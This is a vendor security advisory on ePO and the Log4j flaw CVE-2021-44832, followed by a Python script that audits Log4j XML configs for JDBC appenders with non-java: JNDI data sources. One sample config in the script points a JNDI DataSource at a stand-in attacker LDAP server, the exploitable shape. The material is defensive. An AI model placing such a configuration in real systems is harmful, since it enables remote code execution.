This statement addresses concerns about ePO and the Log4j vulnerability documented in CVE-2021-44832.
MITRE CVE-2021-44832
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when an attacker who can modify the logging configuration file constructs a malicious configuration that uses a JDBC Appender with a DataSource referencing a JNDI URI (for example an LDAP server the attacker controls). Unlike CVE-2021-44228, this issue cannot be triggered by logged data alone; it requires write access to the Log4j configuration. It is fixed in Log4j 2.17.1, 2.12.4, and 2.3.2 by restricting JNDI data source names to the java: protocol.
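The configuration shape the description above refers to can be checked for directly. The script below is an added example written for this page, not code from McAfee, ePO, or the Log4j project: it parses Log4j 2 XML configurations and reports every JDBC appender whose DataSource names a JNDI resource outside the java: namespace, which is exactly what the 2.17.1 fix now rejects. It assumes the concise Log4j 2 XML syntax (element names equal plugin names, such as <JDBC> and <DataSource>); the three sample configurations are constructed for the example and are not ePO's configuration.

```python
"""Audit Log4j 2 XML configurations for the CVE-2021-44832 shape.

The CVE needs a JDBC appender whose DataSource names a JNDI resource
outside the java: namespace (for example an ldap:// or rmi:// URI).
Log4j 2.17.1, 2.12.4 and 2.3.2 reject such names; this script finds
them in a config file so the check can also be run against the older
versions that do not.  Assumes the concise Log4j 2 XML syntax, where
element names are plugin names (<JDBC>, <DataSource>).  Sample configs
are constructed for this example, not taken from ePO.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the exploitable shape, a JDBC appender whose
# DataSource JNDI name points at an attacker-controlled LDAP server.
VULNERABLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="dbAppender" tableName="LOGS">
      <DataSource jndiName="ldap://attacker.example:1389/a"/>
      <Column name="MESSAGE" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: same appender, JNDI name kept in the java:
# namespace, which is all that patched Log4j versions allow.
SAFE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="dbAppender" tableName="LOGS">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="MESSAGE" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: no JDBC appender at all (the situation the
# advisory describes for ePO), so there is nothing to flag.
NO_JDBC_CONFIG = """<Configuration status="warn">
  <Appenders>
    <File name="file" fileName="app.log">
      <PatternLayout pattern="%d %p %c %m%n"/>
    </File>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="file"/></Root>
  </Loggers>
</Configuration>
"""


def jdbc_jndi_findings(xml_text):
    """Return (appender_name, jndi_name, is_safe) for every JDBC appender
    that obtains its connection through a JNDI DataSource.

    Log4j matches plugin names case-insensitively, so tags are lowercased.
    JDBC appenders using DriverManager or ConnectionFactory instead of a
    DataSource are not reported: they do not go through JNDI.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for element in root.iter():
        if element.tag.lower() != "jdbc":
            continue
        appender_name = element.get("name", "<unnamed>")
        for child in element:
            if child.tag.lower() != "datasource":
                continue
            jndi_name = child.get("jndiName", "")
            # Patched Log4j only resolves names in the java: namespace.
            is_safe = jndi_name.lower().startswith("java:")
            findings.append((appender_name, jndi_name, is_safe))
    return findings


def is_config_vulnerable(xml_text):
    """True if any JDBC appender resolves a non-java: JNDI data source."""
    return any(not safe for _, _, safe in jdbc_jndi_findings(xml_text))


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG),
                       ("safe", SAFE_CONFIG),
                       ("no-jdbc", NO_JDBC_CONFIG)):
        print(label, jdbc_jndi_findings(cfg), is_config_vulnerable(cfg))
```

To use it against a deployed system, read each log4j2.xml you ship into `is_config_vulnerable`. An empty result from `jdbc_jndi_findings` is the condition the advisory relies on for ePO: with no JDBC appender present, there is no JNDI data source for an attacker-supplied configuration to redirect, regardless of the Log4j version bundled.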
Research and Conclusions
No version of ePO uses the Log4j JDBC Appender, so the configuration required to exploit CVE-2021-44832 is not present and ePO is not vulnerable. We will nonetheless update the bundled Log4j library to version 2.17.1 or later in a future ePO update.